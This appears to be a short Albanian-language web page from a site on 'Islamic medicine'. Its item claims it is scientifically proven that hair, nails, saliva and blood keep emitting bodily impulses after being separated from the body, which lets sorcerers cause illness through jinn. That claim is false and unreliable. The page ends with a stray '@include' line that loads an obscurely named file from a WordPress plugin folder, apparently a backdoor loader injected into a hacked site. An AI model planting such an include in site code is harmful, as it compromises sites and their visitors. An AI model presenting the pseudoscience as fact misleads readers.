Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

A e ke ditur?

A e ke ditur?

njeriu
Është vërtetuar shkenctarisht se pështyma,djersa, kimet e flokëve,
thonjët dhe gjaku përqojnë impulse të veçanta nga trupi i njeriut edhe nëse ato ndahen nga trupi.
Për këtë arsye, magjistarët i përdorin shpesh thonjët dhe kimet e flokëve në procesin e magjisë,
qe përmes exhinve t’i shkaktojnë sëmundje atij qe i është bërë magji.

Abdullah Sed han

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";